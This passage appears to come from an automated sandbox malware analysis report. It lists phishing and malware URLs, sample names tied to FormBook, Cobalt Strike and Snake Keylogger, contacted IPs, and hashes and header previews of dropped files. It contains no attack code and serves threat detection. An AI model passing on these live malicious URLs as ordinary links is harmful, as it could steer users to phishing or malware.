                                              CMB Monaco Signatures Consent Docs#299229(Revised).pdfGet hashmaliciousUnknownBrowse
                                              • 52.202.204.11
                                              AMAZON-02UShttps://aka.ms/LearnAboutSenderIdentificationGet hashmaliciousHTMLPhisherBrowse
                                              • 76.223.111.18
                                              https://n3ki6w9.r.ap-northeast-2.awstrack.me/L0/https:%2F%2Fet.sp-25.com%2Fe%2Fc%2FOTizp%3FreferCode=product_OT2211aaaaaaaaaa%26shortLink=aaaaa%26longLink=H4sIAAAAAAAAAAXBWxLAEAwAwBNFCFP0Np7DhzLC_bvbzln8IvKCeQSPsM-63EoeIs2BYXW8H9_IafdYUCotqyUCW00Co8wDzmUFkhJ58qVqo35jyZFkUwAAAA==%26ecSource=OT%26referId=8725724309822211/1/010c01918f3a3e79-f24b6623-ae8f-4f46-a748-e9746a6021e2-000000/4Oo6Bk-hd_o5oOs3lBvVzZAlIjU=173Get hashmaliciousUnknownBrowse
                                              • 52.79.158.223
                                              https://indd.adobe.com/view/9cfcac35-338b-4a63-bb28-60a870b890dbGet hashmaliciousHTMLPhisherBrowse
                                              • 18.245.46.74
                                              https://we.tl/t-RErWU1YgQSGet hashmaliciousUnknownBrowse
                                              • 18.245.46.98
                                              https://wavebrowser.co/Get hashmaliciousUnknownBrowse
                                              • 52.222.236.57
                                              http://ebay.to/3u2gAmeGet hashmaliciousUnknownBrowse
                                              • 34.252.40.201
                                              New Al Maktoum International Airport Enquiry Ref #2401249.exeGet hashmaliciousFormBookBrowse
                                              • 76.223.105.230
                                              http://stream.crichd.vip/update/sscricket.phpGet hashmaliciousUnknownBrowse
                                              • 3.122.190.9
                                              https://cisa2024.entegyapp.co.uk/Get hashmaliciousUnknownBrowse
                                              • 3.70.10.198
                                              Quotation-27-08-24.exeGet hashmaliciousFormBookBrowse
                                              • 13.248.169.48
                                              FASTLYUShttps://aka.ms/LearnAboutSenderIdentificationGet hashmaliciousHTMLPhisherBrowse
                                              • 151.101.65.44
                                              1feP5qTCl0.exeGet hashmaliciousUnknownBrowse
                                              • 185.199.109.133
                                              https://indd.adobe.com/view/9cfcac35-338b-4a63-bb28-60a870b890dbGet hashmaliciousHTMLPhisherBrowse
                                              • 151.101.66.137
                                              https://we.tl/t-RErWU1YgQSGet hashmaliciousUnknownBrowse
                                              • 199.232.188.84
                                              http://ebay.to/3u2gAmeGet hashmaliciousUnknownBrowse
                                              • 199.232.188.84
                                              https://github.com/angryip/ipscan/releases/download/3.9.1/ipscan-3.9.1-setup.exeGet hashmaliciousUnknownBrowse
                                              • 185.199.109.133
                                              http://stream.crichd.vip/update/sscricket.phpGet hashmaliciousUnknownBrowse
                                              • 151.101.129.229
                                              virus total.pdfGet hashmaliciousHTMLPhisherBrowse
                                              • 199.232.210.172
                                              Electronic_Receipt_ATT0001.htmGet hashmaliciousUnknownBrowse
                                              • 104.244.43.131
                                              https://messaging-security.comano.us/XdEtiQ3I4emJ5ZldQUWF3SmcwOEQ4cURsb24rSWYyY2loVzV5bktYMlpLSlVxalNnL1RabENaQmozTzkvS3FhK1Z5ZTJDZHlNa1VGbnJDL1g3ZHBLdXdYNUJJbXVhckp5RmFuam41SWhoR0tQUTVWSmNSeEdVdXp3ZmV3eksreWs4dlFnVTBqZG8xUDdFZU9sN1JGZUNtUGdHQnZsVVJLRHREbFNUQm54UWtMa3dmdFNwVENxQTRLaFh3PT0tLUd4TXFReTErSUVBOTZZdDQtLWFZbmE1c254RWIwVWNyTkhyVHN0TUE9PQ==?cid=2140479915Get hashmaliciousUnknownBrowse
                                              • 199.232.196.193
                                              AMAZON-02UShttps://aka.ms/LearnAboutSenderIdentificationGet hashmaliciousHTMLPhisherBrowse
                                              • 76.223.111.18
                                              https://n3ki6w9.r.ap-northeast-2.awstrack.me/L0/https:%2F%2Fet.sp-25.com%2Fe%2Fc%2FOTizp%3FreferCode=product_OT2211aaaaaaaaaa%26shortLink=aaaaa%26longLink=H4sIAAAAAAAAAAXBWxLAEAwAwBNFCFP0Np7DhzLC_bvbzln8IvKCeQSPsM-63EoeIs2BYXW8H9_IafdYUCotqyUCW00Co8wDzmUFkhJ58qVqo35jyZFkUwAAAA==%26ecSource=OT%26referId=8725724309822211/1/010c01918f3a3e79-f24b6623-ae8f-4f46-a748-e9746a6021e2-000000/4Oo6Bk-hd_o5oOs3lBvVzZAlIjU=173Get hashmaliciousUnknownBrowse
                                              • 52.79.158.223
                                              https://indd.adobe.com/view/9cfcac35-338b-4a63-bb28-60a870b890dbGet hashmaliciousHTMLPhisherBrowse
                                              • 18.245.46.74
                                              https://we.tl/t-RErWU1YgQSGet hashmaliciousUnknownBrowse
                                              • 18.245.46.98
                                              https://wavebrowser.co/Get hashmaliciousUnknownBrowse
                                              • 52.222.236.57
                                              http://ebay.to/3u2gAmeGet hashmaliciousUnknownBrowse
                                              • 34.252.40.201
                                              New Al Maktoum International Airport Enquiry Ref #2401249.exeGet hashmaliciousFormBookBrowse
                                              • 76.223.105.230
                                              http://stream.crichd.vip/update/sscricket.phpGet hashmaliciousUnknownBrowse
                                              • 3.122.190.9
                                              https://cisa2024.entegyapp.co.uk/Get hashmaliciousUnknownBrowse
                                              • 3.70.10.198
                                              Quotation-27-08-24.exeGet hashmaliciousFormBookBrowse
                                              • 13.248.169.48
                                              GITHUBUS1feP5qTCl0.exeGet hashmaliciousUnknownBrowse
                                              • 140.82.121.3
                                              https://github.com/angryip/ipscan/releases/download/3.9.1/ipscan-3.9.1-setup.exeGet hashmaliciousUnknownBrowse
                                              • 140.82.121.4
                                              https://energyservices.org/Get hashmaliciousHTMLPhisherBrowse
                                              • 140.82.121.3
                                              https://slopeofhope.com/commentsys/lnk.php?u=https://haconsultores.com.mx/legend/maxwell/ldpzbsp/michaelm@umcu.org&c=E,1,A_Yp496oib_-f1w3pZp4Hud2rskHoBUUu9m1zLjByrw-OpNq6TJQE-QgWUsuKigOG1mWiTep0uj-kK8C5-LvX_Bqh-uGvKRKtcnVwRDbXNCSMFYS3grZceoYqs0,&typo=1Get hashmaliciousHTMLPhisherBrowse
                                              • 140.82.121.4
                                              https://github.com/massgravel/Microsoft-Activation-ScriptsGet hashmaliciousUnknownBrowse
                                              • 140.82.112.21
                                              https://energyservices.org/Get hashmaliciousHTMLPhisherBrowse
                                              • 140.82.121.3
                                              ep_setup.exeGet hashmaliciousUnknownBrowse
                                              • 140.82.121.4
                                              SecuriteInfo.com.Trojan-PSW.Win32.Stealer.cifv.26324.32739.exeGet hashmaliciousPhemedrone StealerBrowse
                                              • 140.82.121.3
                                              http://yathuchandran.github.io/Metamask.cloneGet hashmaliciousUnknownBrowse
                                              • 140.82.114.21
                                              http://web3linksync.pages.dev/Get hashmaliciousUnknownBrowse
                                              • 140.82.121.4
                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              72a589da586844d7f0818ce684948eea1feP5qTCl0.exeGet hashmaliciousUnknownBrowse
                                              • 45.125.66.18
                                              V6ZsDcgx4N.exeGet hashmaliciousUnknownBrowse
                                              • 45.125.66.18
                                              V6ZsDcgx4N.exeGet hashmaliciousUnknownBrowse
                                              • 45.125.66.18
                                              48DhuEoTcX.exeGet hashmaliciousMetasploit, MeterpreterBrowse
                                              • 45.125.66.18
                                              6863(1)2.exeGet hashmaliciousCobaltStrikeBrowse
                                              • 45.125.66.18
                                              20240730#U7cfb#U7edf#U5f02#U5e38#U62a5#U9519.exeGet hashmaliciousCobaltStrikeBrowse
                                              • 45.125.66.18
                                              LisectAVT_2403002B_116.exeGet hashmaliciousUnknownBrowse
                                              • 45.125.66.18
                                              LisectAVT_2403002B_116.exeGet hashmaliciousUnknownBrowse
                                              • 45.125.66.18
                                              LisectAVT_2403002B_312.dllGet hashmaliciousTrickbotBrowse
                                              • 45.125.66.18
                                              2new.dll.dllGet hashmaliciousCobaltStrikeBrowse
                                              • 45.125.66.18
                                              3b5074b1b5d032e5620f69f9f700ff0efile.exeGet hashmaliciousUnknownBrowse
                                              • 185.166.143.48
                                              • 52.216.214.209
                                              SecuriteInfo.com.Win32.CrypterX-gen.18599.19099.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 185.166.143.48
                                              • 52.216.214.209
                                              Setup.exeGet hashmaliciousUnknownBrowse
                                              • 185.166.143.48
                                              • 52.216.214.209
                                              Setup.exeGet hashmaliciousUnknownBrowse
                                              • 185.166.143.48
                                              • 52.216.214.209
                                              Nakliye belgeleri.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 185.166.143.48
                                              • 52.216.214.209
                                              file.exeGet hashmaliciousUnknownBrowse
                                              • 185.166.143.48
                                              • 52.216.214.209
                                              Request for Quotation.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 185.166.143.48
                                              • 52.216.214.209
                                              SecuriteInfo.com.Trojan.Locsyz.2.2D0.720.7591.31980.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 185.166.143.48
                                              • 52.216.214.209
                                              SOA-Al Daleel -Star Electromechanical.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 185.166.143.48
                                              • 52.216.214.209
                                              https://eagle-ageprotection.co.za/hlp41s/aGVsZW4ucmljaGFyZHNAdmlyZ2lubW9uZXkuY29tGet hashmaliciousUnknownBrowse
                                              • 185.166.143.48
                                              • 52.216.214.209
                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              C:\Reka\rapnewsa.exe1feP5qTCl0.exeGet hashmaliciousUnknownBrowse
                                                Process:C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exe
                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                Category:dropped
                                                Size (bytes):38912
                                                Entropy (8bit):5.972409904582663
                                                Encrypted:false
                                                SSDEEP:768:ZCMmeyIJkkZ7XPImohfdjm7MEW/kJ7S/DWJ3GTHvvM1zI:ZCFeySkkJgl2MEW/ozwXM1
                                                MD5:2D4E723C184D9403B078E53F2DE74A23
                                                SHA1:92FA5F8F346CB987F249BD41755C5AEDAF4C8646
                                                SHA-256:0A6BF0678BBD793E39A84DFB4C71D8B709D9E538288BF826C48B1BA899803BA4
                                                SHA-512:A8F5267AE7F465A65A46D6ABEAED0C7A910C349E708E4264CC68747EE26DB78D62B575DEDB2E64553C207B914BA240654930774954DFA7503C93393CFADCE9AD
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: Avira, Detection: 100%
                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                • Antivirus: ReversingLabs, Detection: 16%
                                                • Antivirus: Virustotal, Detection: 24%, Browse
                                                Joe Sandbox View:
                                                • Filename: 1feP5qTCl0.exe, Detection: malicious, Browse
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$................n...............n.....n....Rich..................PE..L...PS.f...............&............0.............@.......................................@.....................................................................X.......................................................p............................text............................... ..`.rdata..............................@..@.data...D...........................@....reloc..X...........................@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:data
                                                Category:modified
                                                Size (bytes):64
                                                Entropy (8bit):0.34726597513537405
                                                Encrypted:false
                                                SSDEEP:3:Nlll:Nll
                                                MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                Malicious:false
                                                Preview:@...e...........................................................
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
